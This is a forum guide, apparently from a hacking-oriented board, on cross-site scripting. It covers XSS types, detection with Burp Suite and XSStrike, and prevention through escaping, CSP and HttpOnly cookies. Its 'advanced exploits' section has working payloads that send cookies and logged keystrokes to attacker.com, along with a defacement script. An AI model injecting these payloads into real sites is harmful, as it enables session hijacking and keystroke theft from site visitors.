💥 [GUIDE] Cross-Site Scripting (XSS) – How to Exploit & Prevent It [2025]

BlueBird · Jan 26, 2025

Cross-Site Scripting (XSS) is one of the most common web vulnerabilities, affecting thousands of websites each year. If exploited, an attacker can steal user sessions, perform phishing attacks, or completely deface a website.

This guide will cover:

What XSS is and why it’s dangerous

The three main types of XSS attacks

How to detect and exploit XSS vulnerabilities

Best practices for securing web applications

What is Cross-Site Scripting (XSS)?

XSS occurs when a website improperly processes user input, allowing an attacker to inject and execute JavaScript in a victim’s browser.

Example of a vulnerable website:

html said:
<p>Welcome, <b><?php echo $_GET['name']; ?></b></p>

If a site does not sanitize input, an attacker can execute JavaScript using:

https://example.com/?name=<script>alert('XSS')</script>

If this results in a popup alert, the website is vulnerable.

🕵️ Types of XSS Attacks

Stored XSS (Persistent XSS)
The malicious script is permanently stored in the website’s database and executed every time a user visits the affected page. Commonly found in comment sections, user profiles, and forums.

Reflected XSS
The malicious script is included in a URL and executed when a victim clicks on a crafted link. This is often used in phishing attacks.

DOM-Based XSS
The vulnerability exists entirely on the client-side, manipulating the webpage’s Document Object Model (DOM) without interacting with the server.

How to Find & Exploit XSS Vulnerabilities

Manual Testing for XSS:
Try injecting common payloads into input fields or URLs:

<script>alert('XSS')</script>
"><script>alert(1)</script>
'"><img src=x onerror=alert(1)>

If the input is reflected back without sanitization, the site may be vulnerable.

Using Burp Suite for XSS Detection:
1. Intercept traffic with Burp Suite.
2. Modify request parameters with XSS payloads.
3. Observe the responses for JavaScript execution.

Automating XSS Detection with XSStrike:

bash said:
git clone https://github.com/s0md3v/XSStrike.git
cd XSStrike
python3 xsstrike.py -u "https://target.com/search.php?q=test"

XSStrike automatically detects and exploits XSS vulnerabilities.

Advanced XSS Exploits

1. Session Hijacking via XSS
If cookies are not set with `HttpOnly`, an attacker can steal them:

javascript said:
<script>document.location='https://attacker.com/steal.php?cookie='+document.cookie;</script>

2. Defacing a Website with XSS

javascript said:
<script>document.body.innerHTML = '<h1>Hacked</h1>';</script>

3. Keylogging via XSS

javascript said:
<script>
document.onkeypress = function(e) {
fetch('https://attacker.com/logger.php?key='+e.key);
};
</script>

How to Prevent XSS Attacks

1. Input Validation & Sanitization
Escape special characters before rendering:

php said:
echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');

2. Use Content Security Policy (CSP)
A strong CSP blocks inline scripts:

http said:
Content-Security-Policy: default-src 'self'; script-src 'self'

3. Secure Cookies
Set `HttpOnly` and `Secure` flags to protect sessions:

http said:
Set-Cookie: session=xyz; HttpOnly; Secure

Conclusion

Cross-Site Scripting is one of the most exploited web vulnerabilities. Pentesters should know how to detect and exploit XSS, while developers must implement strict input validation and security measures.

What’s the most interesting XSS vulnerability you’ve encountered? Let’s discuss below!

Lincoln · Jan 27, 2025

Xss is definitely the best, but I started with sqlmap a very long time ago to build confidence but I still prefer Xss for the wider range of payload options

💥 [GUIDE] Cross-Site Scripting (XSS) – How to Exploit & Prevent It [2025]

BlueBird

What is Cross-Site Scripting (XSS)?​

🕵️ Types of XSS Attacks​

How to Find & Exploit XSS Vulnerabilities​

Advanced XSS Exploits​

How to Prevent XSS Attacks​

Conclusion​

Lincoln

Senior Fraud Engineer